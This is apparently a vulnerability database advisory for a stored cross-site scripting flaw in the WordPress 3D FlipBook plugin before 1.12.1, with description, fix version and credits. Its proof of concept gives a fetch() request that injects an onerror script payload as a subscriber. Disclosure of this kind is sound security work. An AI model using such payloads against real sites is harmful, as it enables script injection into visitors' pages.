WordPress Plugin Vulnerabilities
3D FlipBook < 1.12.1 - Subscriber+ Stored Cross-Site Scripting
Description
The plugin does not have authorisation and CSRF checks when updating its settings, and does not have any sanitisation/escaping, allowing any authenticated users, such as subscriber to put Cross-Site Scripting payloads in all pages with a 3d flipbook.
Proof of Concept
As a subscriber:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=fb3d_receive_book_control_props&props[lightbox][default]=xxx\"><img src onerror=alert(/XSS/)>",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered in all pages with a 3d flipbook Affects Plugins
Fixed in version 1.12.1
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-02-28 (about 6 months ago)
Added
2022-02-28 (about 6 months ago)
Last Updated
2022-04-17 (about 5 months ago)